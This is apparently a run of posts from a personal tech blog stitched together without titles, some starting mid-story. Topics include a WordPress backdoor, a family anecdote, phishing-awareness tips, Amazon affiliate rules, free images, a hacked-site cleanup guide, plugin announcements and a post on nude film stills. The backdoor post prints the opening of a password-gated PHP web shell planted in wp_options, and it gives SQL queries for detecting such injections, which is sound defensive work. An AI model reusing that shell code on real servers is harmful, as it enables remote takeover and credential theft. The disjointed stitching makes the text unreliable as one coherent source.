It looks like the culprit might have been a security hole in phpmyadmin. Hopefully this will turn out to be what was wrong, because Rackspace upgraded all of their installations of that package this past Saturday. If so the initial security could very well be plugged, although of course we don’t know for sure that was what was affecting all of these customers yet. In either case, however, simply plugging the hole will not be enough for affected websites.

The Unmask Parasites blog went into depth about how the various files were injected with malicious code, and how fake admins were used to modify the theme files on the installation. However, what they (and as far as I can tell everyone else) missed was a backdoor that I found injected directly into the wp_options table. The record had an option_name of “wp_optimize”, autoload set to “on” (which means that the option is automatically loaded with WordPress), and an option_value of php shell code:

1
2
3
4
5
6
7
8
9
10
11
12

$kmd5='510a584f9747c1262b5ef3c89bd9afb4';$shellver='1.7.5-stable';
if((isset($_POST['sh'])&&(md5(md5($_POST['sh']))==$kmd5))or(isset($_GET['sh'])&&(md5(md5($_GET['sh']))==$kmd5)))
{
    $kuppa=getcwd();
    if	(file_exists($kuppa."/wp-config.php"))   	      {include ($kuppa."/wp-config.php");};
    if	(file_exists($kuppa."/wp-includes/formatting.php"))   {require_once ($kuppa."/wp-includes/formatting.php");};
    if	(file_exists($kuppa."/wp-includes/kses.php"))         {require_once ($kuppa."/wp-includes/kses.php");};
}
 
if (!function_exists('update_option_1')):
    function update_option_1( $option_name, $newvalue )
...

In all it was 1216 lines of code. You can view the entire file here: sql-injection-wp-optimize.txt. It allows an attacker to basically run any commands or upload any file to the server that they want to. Deleting or cleaning all of the infected files on the server won’t help as long as this code is still in the database. Please, if you have been hacked (regardless of whether or not you are on Rackspace hosting) please make sure you check your databases for malicious code like this.

An easy way to check for these types of suspicious entries in a hacked WordPress database is to run the following MySQL query:

1

SELECT * FROM wp_options WHERE (option_id LIKE '%base64_decode%' OR blog_id LIKE '%base64_decode%' OR option_name LIKE '%base64_decode%' OR option_value LIKE '%base64_decode%' OR autoload LIKE '%base64_decode%') order by option_id

So far the only legitimate entries I have found returned from that query were rss entries pulling in blog posts discussing the base64_decode() php function, so if you find an entry in the database that doesn’t look like someone’s blog post, odds are you are going to want to delete it.

A little while later I went into my own bathroom, and while in there happened to glance at my own tub…

I called her back and asked her how much water was in her tub. She said maybe an inch or so. I asked her to go look at it, and she informed me that she was already in there.

Me: “You know that little lever just below the spout? Is it pointed up, or down?”

My mom: “Up”

Me: “Push it down”

(silence… except for the sound of water draining from her tub…)

My mom: “Who the fuck put that up???”

At this point I can barely breathe because I am laughing so hard. She adds more water to the tub, just to make sure it actually is going down, and swears some more.

Me: “Mom, how long has your tub been ‘clogged’?”

My mom: “A week”

I lost it. I’m still giggling as I write this. During her extensive cussing she tried to get me to swear never to tell a soul, but I just had to share.

You may also like: Taylor Swift’s, Um, Like, YouTube Interview

I use an early warning hacking detection system that Donna came up with last year with and I helped refine, MonitorHackdFiles, that alerts me whenever there are any files modified or added on my blog. This script has been indispensable in helping me to clean up damage from hacks before either my rankings were harmed or an infection spread to my readers. However, based on the folder structure on the database entry that I found, this was from a hack that happened prior to me installing that script. I checked, and the file definitely does not exist, either physically or virtually (I get a 404 trying to access it on the web), which makes sense since I did completely wipe and reinstall WordPress several times last year. I also always check the wp_posts, wp_users, and wp_options (especially the active_plugins entry) after a hack for any irregularities, but never thought to check wp_postmeta, which is where information about uploads is stored. I have been hacked a few times, and this is apparently the only one that actually used the uploads folder. All of the other hacks hid files amongst the WordPress system files or injected data into the database. Just to be safe though, from now on I am adding to the checks that I perform to the database to include scanning that table for any non image files, like so:

SELECT * FROM wp_postmeta
WHERE meta_key='_wp_attached_file'
AND (
	RIGHT(meta_value,4) NOT IN ('.jpg','.gif','.png','.avi','.mp3','.mpg','.flv')
	OR meta_value LIKE '%.php%' OR meta_value LIKE '%.pl%'
	OR meta_value LIKE '%.exe%' OR meta_value LIKE '%.js%'
)

This should display the entries in your database that match the contents of your uploads directory, filtering out the most common safe files while definitely including the most suspicious ones.

I couldn’t find anyone discussing the rzf.php file when I looked, but I did find a couple of sites that were hacked from it. It apparently generates a list of links that all point back to itself with various d=xxx parameters:

Each of these pages then generates a list of other self-referential links, plus some added text, and a small percentage of external links. All of the links that I looked at lead back to what appeared to be valid sites, presumably to better hide the actual target. Even though this may be the only function of the file, if the file itself is found in your directory structure, and not just a leftover database remnant like mine was, it is probably best to do a complete cleaning, just to be safe.

The sites in question will occasionally give out warnings or advice to their users about not entering in their passwords except when actually on their sites, which is of course what you are supposed to make sure you are doing. The problem, however, is that the warnings hardly ever go into detail about what they actually mean by that. Most of us in the IT field, or people who use the internet frequently and have been doing so for a long time, just assume that everyone we say that to knows exactly what we are talking about. However, multiple conversations I have had with friends on the phone in the past, where I was trying to walk them through installing anti-virus (for Windows users I recommend Avast, by the way) clued me in to the fact that for many people simply saying “Make sure you are on the site you think you are” won’t be enough:

Me: Ok, type this into the address box: a – v – a – s – t – dot com. Then hit Enter.
Friend Ok, done.
Me: Good. Do you see the download link…?
Friend: No. I see… (at this point they start reciting what sounds suspiciously like search results)
Me: Wait… are you in Google? Did you type what I said into the search box?
Friend: Yeah, isn’t that what you said?
Me: No, I need you to type it into the address box, so that you don’t accidentilly click on an ad for a different product.
Friend: Oh, ok. (pause)
Friend: Where is that?

After this happening more than once I decided that a visual tutorial on how not to get hacked on Facebook might be needed.

It’s only a Facebook account, why should I care about security?

Glad you asked. While it is true that sites like Myspace and Facebook are more for entertainment and socializing than for business, and you usually aren’t doing anything extremely sensitive (like banking or dealing with medical records) on them, there are still some very solid reasons to keep your information secure:

1. Stolen Passwords mean stolen identity

While it is true that most scammers who steal your password do so in order to send out spam, there really is nothing stopping them from using it for more devious reasons instead. True, you usually don’t store your credit card info on your Facebook account, but disguising themselves as you could still be used to scam people who trust you (Your favorite grandson sent you a message on Facebook: “Grandma? I’m stuck in Houston and my phone is dead. Can you wire me some money please?”).

2. Many people re-use their passwords everywhere

This is not a good idea, but it is a reality. Most of these sites use your email address as your login. If you happen to use the same password for your email as you do for your social media accounts, then this gives the hackers access to all other accounts that you happen to have used that email for, even if you used a different password, since all they have to do is hit the Lost Password link and then log in to your email to get the new one. As a side note, the password generator I built can help with this, since it is generates easy to remember passwords, making it easier to maintain different passwords for different accounts. At the very least your email password should be unique and hard to guess, since that is in essence a master password for all of your other accounts.

3. More personal information is collected every day than many people realize

Recently there has been a fuss about the new Facebook privacy settings, and what you can and cannot make private. It is the belief that their information is private that lured many people into giving away more info than they probably had intended. If someone gains your password then it of course won’t matter what your privacy settings are, they can just browse your account (and private messages) at their leisure.

Here are some visual cues to let you know whether or not the link you clicked on is really what it seemed to be.

Look at the actual address bar to see what website you are really on.

An easy way to know where to look when looking at a web page address is to remember that the address bar is not located on the actual webpage. It is part of the browser window (Internet Explorer, Firefox, Safari, Chrome, etc.) itself. It’s located at the top, in the section that has the exact same layout and look and feel regardless of which webpage you are visiting. It is usually above any toolbars you might have installed. It is also distinct from any search boxes that a toolbar or browser may have:

(click to enlarge)

In Internet Explorer 8 the address bar looks like this:

Look at the address again… closely.

A url (or webpage address) is composed of multiple parts. The first section of the url is known as the “domain”. This section is always located between the “http://” at the beginning, and the very next forward slash (“/”) that you see. For instance, the domain you want to be on when logging into Facebook is “www.facebook.com”. The “www” portion may change, but if you see anything between the “.com” (or “.net” or “.org”, etc.) and the next slash, then the site is not what it is pretending to be:

Some other quick visual cues that might help:

Does the message really sound like your friend?

In most cases when an automated message is sent from a hacked account it is either the same message sent to everyone, or it is a small set of short messages pulled from a library. The most common are probably messages asking “is this you?” and referencing a picture or video that has supposedly been posted to the internet. In a setup like Facebook’s, where you not only see what messages are sent to you but can also view your friends other publicly posted messages, you can often tell that someone’s account has been hacked because they will start sending a series of odd or repeated messages, all containing links:

If the link was in an email from the website, does the sender’s address look right?

Not all phishing attempts are going to come from people on your friends list. Sometimes scammers will send out mass emails pretending to be from the social websites themselves. While the actual From field in an email can be faked, often times in these cases they are not forged properly. Any emails from Facebook, for instance, should actually have “@facebook.com” in the email address, and not random characters or be from Hotmail:

Are there any mistakes on the login page?

It is of course possible to make an exact perfect copy of a login page for any given site, but not all hackers bother to do so. Take a quick glance at the page before logging in. For instance, you might see an extra less-than sign, like in this fake Twitter login page, which is usually a sign of broken html somewhere:

And major social media websites are never hosted on free hosting accounts, which usually add in their own text or ads to every webpage:

And lastly, one of the biggest clues that a login page is fake…

Were you logged in before you clicked on the link?

Except in households where more than one person has an account on a particular social medial site, or in cases where you are logging in from a public (or work) computer, most people simply never bother logging out of the site. If you are reading a message someone sent you on Facebook itself, then you have to be logged into Facebook in order to read it. If the message asks you to click on a link, and the page it takes you to asks you to log into Facebook again, then something is wrong.

Hopefully these simple tips will help some of you from giving away your accounts, even temporarily, to people you would rather not give them to.

I decided to go through the affiliate operating agreement myself to see if I could understand why they were doing this. I realized after I read it that they were not in fact saying any such thing. I wrote them to see what was up, and what the specific issues were.

It took 4 emails to them, with the first 3 coming back with the same answer, that they were not allowed because you are not allowed to use redirects. The problem is that the language of the agreement only mentions redirects in conjunction with either ppc traffic (you cannot link a ppc ad directly to Amazon, or via a redirect, it requires a click from your site to be valid), and with hijacking someone else’s traffic (no redirecting or interfering with someone else participating in the program). Eventually, however, I got someone who understood what I was saying and they agreed that it is indeed acceptable to do so. Here is there final reply:

Dear Michael,

Thank you for writing back to us and I sincerely apologize for the delay in responding to your message. I have carefully reviewed your correspondence with us. As you mention, you would not be permitted to use a shortened URL to an Amazon.com page as the destination URL for paid search advertisements because Associates are not permitted to engage in keyword bidding or other paid search on Google, Yahoo, MSN, and other search engines, and their extended search networks, to send traffic to our site.

However, you can use shortened URLs on your Facebook or Twitter accounts. You may be asked to provide the specific sites on which the shortened URLs are posted, which would mean that your Facebook and Twitter profiles would need to be publicly accessible for review if you used the URLs on those sites.

I apologize for the misunderstanding regarding your inquiry and I hope this information is helpful to you. If you have further questions, please use the Contact Us form available on Associates Central or by following this link:

https://affiliate-program.amazon.com/gp/associates/contact

Thank you for your participation in the Associates Program.

Best regards,

Richard – Associates Account Specialist

http://www.amazon.com

Note that he did state that the specific sites where you intended to post the links needed to be provided, so if you are an Amazon affiliate and think you might possibly post a link on either Twitter or Facebook, you should probably submit those profiles to Amazon asap and go ahead and get them listed in your Amazon account. One of the other emails from them gave me these instructions for doing so:

If you would like to add another website or multiple websites to your existing Associates account, we first need to view and approve the sites content before it can be added.

Please send us the URLs for the sites, and we will review them and let you know our decision. Once approved, we will send you instructions on how to add the URLs to your account. You can contact us back by using the secure form at the following specialized link:

http://affiliate-program.amazon.com/gp/associates/contact/

Keep in mind that if your Facebook page is set on private we will be unable to approve its addition to your account because we need to be able to view your site at any given time to make sure you are in compliance with our guidelines.

I have gone ahead and provided the entire conversation thread with Amazon here. I hope this helps anyone who might have had issues with this.

The Problems

Two internet no-no’s that beginner web publishers often perform, many times without even realizing that they are doing anything wrong, are image theft and image hotlinking. The bottom line is that most images on the Internet are in fact copyrighted, and therefore cannot be used without the original author’s explicit permission (assuming, of course, that the original author is still in fact the copyright holder). Just because you find a picture posted on a public forum or on a newsgroup does not mean that the person who posted it had the right to post it, and if they did not then republishing it on your own site makes you just as guilty of copyright infringement as they are. While 9 times out of 10 you might get away with it, using someone else’s copyrighted material can lead to troubles (and time wasted dealing with those troubles) in the form of a DMCA Takedown Notice. In extreme circumstances, depending on your host and the degree of the infringement, this can even lead to the interruption of your hosting account.

Hotlinking an image is a little less of a cut and dried issue as far as whether or not it actually violates copyright laws. As far as I know the matter simply has not been tested in court, and legal opinions concerning it can vary. What is generally agreed upon regarding it is that it is impolite at best (regardless of arguments about how cheap bandwidth is). Additionally, you do run the risk of whoever you are hotlinking the image from simply switching it out for a different image if the request shows your site as the referrer (check out John McCain’s MySpace Page “Enhanced” for a classic example of this).

The Solutions

Luckily, however, there are plenty of images available out there that you can use, as long as you know how to find them. You can use any images that are within the Public Domain freely, and with a few easily followed terms many photographers and artists offer their images available under the Creative Commons license. Also, there are a few Free Stock Photo sites out there as well that offer a nice selection of images that can be used in blogs posts.

Finding Public Domain Images

Public Domain refers to any work that is not copyrighted or work on which the copyright has expired. Instead of worrying about how to try and find formerly copyrighted images where the copyright has expired, I am going to focus on how to locate ones that were never copyrighted in the first place. In the US, works that are authored by the federal government are not copyrighted, and therefore fall into the Public Domain. It is important to note that the distinction is works that were authored by them, and not all works that are owned by them. If a private individual creates the work, and then sells or transfers the copyright to the government, the work is still copyrighted. Also, some specific images might have use restrictions on them. A good example of this is the NASA logos… the general permission to use all images found on the NASA site does not extend to the logos. Specifically, none of the three logos may be used “by persons who are not NASA employees or on products (including Web pages) that are not NASA sponsored.” All others are pretty much fair game.

Now that we know where these images are that we can use, we need to figure out how to search through them and find the ones we want. There are a couple of useful methods for doing this. One of the easiest ways is simply going to Google Images, and performing a “site:{somegovtsite.gov}” search, plus whatever keyword you are looking for. Which federal government site you choose will most likely be based on what types of images you are trying to hunt down. For instance, if you need to find a good wildlife picture, then the US Forest Service at www.fs.fed.us is probably a good place to start. So, if for instance you need a deer picture, you would go to Google Images and type in:

[site:fs.fed.us +deer] (note that dropping the “www” from the “site:” search enables you to pick up any subdomains as well)

While not all of the images are exactly what we are looking for, we can see that some nice matches do come up on the front page:

If you notice results that appear to be from sites other than ones owned by US government (such as Blogspot or Myspace), don’t worry… those are people who are using hotlinked images on their own pages. The images themselves are still hosted on the government websites. Some good examples of federal government sites that are rich in images, along with the number of images returned for each by using the “site:” command without a keyword in Google Images, are:

• NASA (nasa.gov) – 1,020,000 image results
• The Whitehouse (whitehouse.gov) – 116,000 image results
• Library of Congress (loc.gov) – 186,000 image results
• Government Printing Office (gpo.gov) – 8,370 image results
• Department of Education (ed.gov) – 23,400 image results
• National Oceanic and Atmospheric Administration (noaa.gov) – 317,000 image results
• Department of Energy (energy.gov) – 22,100 image results
• Environmental Protection Agency (epa.gov) – 65,000 image results
• US Forest Service (fs.fed.us) – 122,000 image results
• Federal Aviation Administration (faa.gov) – 9,720 image results
• US Army (army.mil) – 304,000 images results

Using parenthesis and the OR operator, you can also search multiple government sites at once, like so:

[airplane +(site:army.mil OR site:nasa.gov OR site:site:faa.gov)]

Which in the above example will search the US Army, NASA, and the Federal Aviation Administration websites for images matching the keyword [airplane] all at the same time.

Another option for searching the federal stockpile of images is to use the image search functionality on the USASearch.gov website. While you don’t have the luxury of being able to restrict your search to specific sites, you do have the added ease of being able to search all of the federal government sites at once, along with certain archives that might not be indexed by Google.

Finding Creative Commons Images

The Creative Commons is a set of free licenses that allow artists to share their work, while still retaining some of their rights. For bloggers, usually the images they will be most interested in are those that are licensed under straight Attribution. That means that you are free to share or modify the images as you need, even for commercial purposes, as long as you attribute the original work of the author in the manner they specify. This is usually done simply via a link back to the original image.

Google has an option on their Advanced Search to only search documents that are released under Creative Commons license. However, for some reason they don’t offer the same option under the Google Images search. Even if you search for a keyword and restrict the results to only show Creative Commons results in Web Search first, and then click on the Images link, the url parameter that tells Google that you want to restrict the search results is dropped. Luckily though, adding the parameter in manually does in fact work. I created a small tool on Bad Neighborhood that allows you to enter a search term in, and it will open up a Google Images search with the parameter that restricts the results to only show images released under Creative Commons here:

Creative Commons Google Image Search Assistant

Most of the results that you will see with this search will either be from Flickr and Picasa Web, since those images appear to be the ones that Google has the easiest time identifying the licensing on.

Unless you uncheck the checkbox at the bottom of the last paragraph on the page, you will notice that 2 windows open at the same time when you use that tool. This is because Flickr also has it’s own integrated Creative Commons search, on it’s Advanced Search page, but since the link to that page doesn’t show unless you perform a regular search first, many people won’t realize that it is an option. This tool includes a search on Flickr as well by default, without you having to go to the Advanced Search page first.

If you want to perform just the Flickr search, you can go there, and click on the search button. The link to the Advanced Search will then appear just to the right of the search box:

Once there, scroll down to the last set of options, and you will see 3 checkboxes that you can use to search only for content that you are allowed to use under the Creative Commons:

Once you find a picture that you think fits, you can verify that it is indeed released under Creative Commons by looking for the CC logo in the right hand column:

Just remember to attribute the author of any original work that you use.

Finding Free Stock Images

Lastly, there are of course the Free Stock Photo sites that most people are aware of. Last year Donna Fontenot wrote a post about her Favorite 10 Free Stock Photo Download Sites. Out of those, I picked my favorite 7, and built a tool using the same “site:” search plus OR operator method I described above:

Bad Neighborhood Free Image Meta Search

Simply enter your keywords into the box and hit Search. A new Google Images window will open up, allowing you to simultaneously search all 7 sites as once for images matching your keywords. While the selection may not be quite as great as going to each site one by one and using their built in search functionality, it can be much, much quicker to find a graphic that fits your needs this way.

Happy Image Hunting.

While almost all sources will recommend that you upgrade your WordPress to the latest version, what the majority neglect to tell you is that in most cases simply doing so will not prevent the attackers from getting back in, even if there are no known exploits with the latest version. The hackers may have left a back door file hidden in a directory where it wouldn’t get overwritten with an upgrade, or inserted code into your theme, or simply created an account that they then granted admin privileges to. Any one of those would allow them back in, even after you patched what was wrong the first time. Therefore I am providing this step by step process on how to completely clean out and restore a WordPress installation that has been hacked.

1. Backup the site and the database.

Even a hacked copy of your blog still probably contains valuable information and files. You don’t want to lose this data if something goes wrong with the cleanup process. Worst case scenario you can just restore things back to their hacked state and start over.

2. Make a copy of any uploaded files, such as images, that are referenced.

Images are generally exempt from posing a security risk, and ones that you uploaded yourself (as opposed to ones included with a theme, for instance) will be harder to track down and replace after things are fixed again. Therefore it is usually a good idea to grab a copy of all the images in your upload folder so as to avoid broken images in posts later. If you have any non-image files that could potentially have been compromised, such as zip files, plugins, or php scripts that you were offering people, then it is a good idea to grab fresh copies of those from the original source.

3. Download a fresh version of WP, all of the plugins you need, and a clean template.

Using the WordPress automatic upgrade plugin does make it easier to upgrade every time a new version comes out. However, it only replaces WordPress specific files, and does not delete obsolete ones. It also leaves your current themes and plugins in place, as is. This means that if used to upgrade a blog that has already been compromised, it can very well leave the attackers a way back in. It is best to start over from scratch as far as the files portion of your installation goes. Note that if you use the EasyWP WordPress Installer script that I wrote it saves you from having to download, unzip, and then upload all of the core WordPress files, although you will still need to grab fresh copies of the themes and plugins that you want to use.

4. Delete all of the files and folders in the WP directory, either through FTP (slower) or through cPanel’s File Manager (faster).

Now that you have fresh copies of all the files you need, and copied all of your uploaded images, completely delete the entire directory structure your blog is in. This is the only surefire way to completely remove all possibly infected files. You can do this through FTP, but due to the way that FTP handles folder deletion (ie. it walks the directory structure, stores each and every file name that needs to be deleted, and then sends a delete command for each one), this can be slow and in some instances cause you to get disconnected due to flooding the server with FTP commands. If available it is much faster to do this through either cPanel’s File Manager, or via command line if you happen to have shell access.

5. Re-upload the new fresh copies you just grabbed.

This step should be self explanatory, but I would like to mention that if your FTP client supports it (I use FileZilla, which does) and your host allows it, then increasing the number of simultaneous connections you use to upload can greatly reduce your overall transfer time, especially on servers or ISP’s where latency is more of an issue than bandwidth. In FileZilla this setting is found by going to “Edit -> Settings -> File transfer settings”:

Also, if not using the EasyWP WordPress Installer script, don’t forget to edit and rename your wp-config.php file (when freshly unzipped this is named wp-config-sample.php).

6. Run the database upgrade (point your browser at /wp-admin/upgrade.php).

This will make any necessary changes to your database structure to support the newest version of WordPress.

7. Immediately change your admin password.

If you have more than one admin (meaning any user with editing capabilities), and cannot get the others to change their passwords right then, I would change their user levels until they can change their passwords as well. If there is anyone in your user list that has editing capabilities, and you do not recognize them, it’s probably best to just delete them altogether. If changing passwords is something you hate doing, then maybe my new memorable password generator can make that a little less stressful for you.

8. Go through the posts and repair any damage in the posts themselves.

Delete any links or iframes that were inserted, and restore any lost content. Google and Yahoo’s caches are often a good source of what used to be there if anything got overwritten. The following query run against the database can help you isolate which posts you want to look at:

SELECT * FROM wp_posts WHERE post_content LIKE '%<iframe%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%<noscript%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'

If you did not change the default prefix for WordPress tables, than you can copy and paste that directly into a query window and run it, and it should pull up any posts that have been modified to hide content using any of the methods I have come across so far (iframes, noscript tags, and display:none style attributes). To get to a query window in cPanel, you would click on the MySQL® Databases icon, scroll to the bottom of the page, and then click on phpMyAdmin. Once the new window or tab opens, you would click on the database in the left hand side that your blog was in, and then in the right side at the top click on the SQL tab. Then just paste the query into the large text area and hit the Go button.

Note, however, that there may be other types of injected content that I haven’t seen yet, and that a manual inspection looking for the types of patterns that first alerted you to the fact that your blog was hacked is always a good idea.

UPDATE: 9. If you are having issues cleaning the installation yourself

When I wrote this post back in 2008 I intended it to be a do it yourself guide for the non-techie. However, I do realize that some people would still rather a professional programmer perform many of the steps I outlined here. If anyone has had their WordPress installation hacked, and either is uncomfortable attempting to clean it on their own, or has tried to do so with no success, I am available on a case by case basis. Most cleanings can be performed in about one hour, two at the most. The time can vary depending on the size of the blog, the amount of customization to the original theme, and the number of plugins installed. Feel free to contact me here if you feel like you could benefit from my help. Please include the site and any details that you think might be relevant (pro theme, anything you may have tried on your own, etc.) in the contact form.

UPDATE #2: 10. A note on hosting.

This past year (2010) has seen multiple waves of attacks on people’s websites that happened not due to insecurities within the WordPress platform itself, as has historically been the issue, but rather due to vulnerabilities with the actual hosts. Some of the bigger names that were hit include GoDaddy, Rackspace Cloud, MediaTemple, and Network Solutions, for instance. It is very important that you use a host that is not only well versed in security, but one that is stable and has knowledgeable tech support as well.

My personal recommendation for shared hosting is Hostgator. It is where this blog and many other sites of mine are currently hosted. Yes, that is an aff. link, but I would recommend them even if it wasn’t. For a dedicated solution that is both affordable and robust I use The Planet, which is where I host Bad Neighborhood. Both companies are ones that I have been using for years without issues, and that I do recommend to my own clients when they find themselves dissatisfied with their current hosts. If you were hacked, and your WordPress was up to date when it happened, then a change of hosts is something you should consider looking into.

Me? I’m just not that patient.

Therefore I have written a WordPress Installer script, named EasyWP, that removes that hassle completely. Simply download and unzip EasyWP.zip (download link on this page). Upload easywp.php (a single file that is a mere 8KB) to the folder where you want to install your blog. Any directory will do, including the root directory, as long as WordPress isn’t already installed in it (this script is designed to do clean installs only) and PHP can write to that directory (either through setting the permissions, or through PHPSuExec running on your server). Next, visit the page wherever you uploaded it to (ie. http://www.yourserver.com/blog/easywp.php), fill out the form, and hit the “Go!” button.

EasyWP will download the latest version of WordPress, unzip it into the directory where you want to host your blog, and modify your configuration file based on the information you entered into the form. Then it tests your database connection. If that fails, it gives you a chance to re-edit the info you entered, so if you made a mistake there is no need to edit and re-upload the config file separately
(just like when you install WordPress without the script, you do have to create the database and user beforehand). After that it takes you to the normal WordPress setup page, where you finish the process.

That’s it.

To recap: you can now upload and configure an entire brand new WordPress installation in under 30 seconds. Feedback and suggestions are of course welcome.

Pervs of course are free to skip to the bottom.

PuzzCAPTCHA is my new comment form spam protection plugin for WordPress, which can be downloaded from here. It is built on the premise that while computers are advanced enough to employ OCR (Optical Character Recognition) to crack most existing CAPTCHA’s, and while they can certainly solve image puzzles if they know what the image is of ahead of time, presenting them with both simultaneously will at the very least significantly slow them down (and thus greatly reduce the number of CAPTCHA’s cracked in any given time period). Humans, however, have the ability to solve what the the end puzzle looks like as they assemble the image. This means that presenting a CAPTCHA as a puzzle allows for increasing the difficulty for a computer to solve it, while at the same time presenting a much clearer image to the end user, which is a trend opposite of what we currently see today. Here are some examples of the kinds of CAPTCHA’s that currently piss me off:

And now we have new ones coming out like this little gem reported on by GeeksAreSexy. Ugh.

Now, with PuzzCAPTCHA, you get something more along the lines of this (after moving the pieces around):

MUCH nicer, don’t you think?

LinkMyPics is a new widget I wrote, which is a Hotlink Advantage Maximizer. There are other websites that will give you instructions on how to turn images or hotlinking into links that work on the same principle as LinkMyPics, but those implementations usually turn out to be buggy, too much work to implement, or the solution can often break layouts. If you want to see it in action, right click on any of the images in this post as if you were going to either save it locally or grab the properties so you could hotlink it in your own website. You are then shown a box with instructions on how to use the image on your own site, using either HTML or BBCODE, and the code shown includes a link back to the page where the image was originally seen. Yes, people can (and will) remove the link portion… be many will not bother modifying it and will just copy and paste what they are given. Pretty neat, huh? You can download LinkMyPics here, and instructions are provided on that site. I have also implemented the code on the topless Evan Rachel Wood pics in this post, so feel free to test on those as well.

Speaking of…

Since I don’t believe in fraudulently ranking for a given phrase, here are the images I mentioned in the title (those who need to can close their eyes now):

I know, pretty tame. But what did you expect? I said it was PG13 right at the beginning. The reason these particular screen grabs interested me is that when I was watching the movie they came from (Across The Universe, a musical released last October), and I saw that scene, I suddenly realized that I had never seen any of the normal buzz that usually surrounds when a young actress appears nude or semi-nude in a movie for the first time (which I believe this is for her). So, I searched on Google Images, and as I said, no valid results showed up (for me anyways, searches can vary by location) in the first 5 pages I checked, which I found very odd. My assumption is that the population of geeks who own websites who know anything about optimizing for images in search who were also likely to be the type of people who would actually post topless pics, when intersected with the type of people who would admit to watching musicals (which Across The Universe happened to be), was so small that none of the images had made it into the mainstream yet. So, for all those who happen to come to this post looking for just that (assuming of course that I do actually wind up ranking for that phrase), there ya go.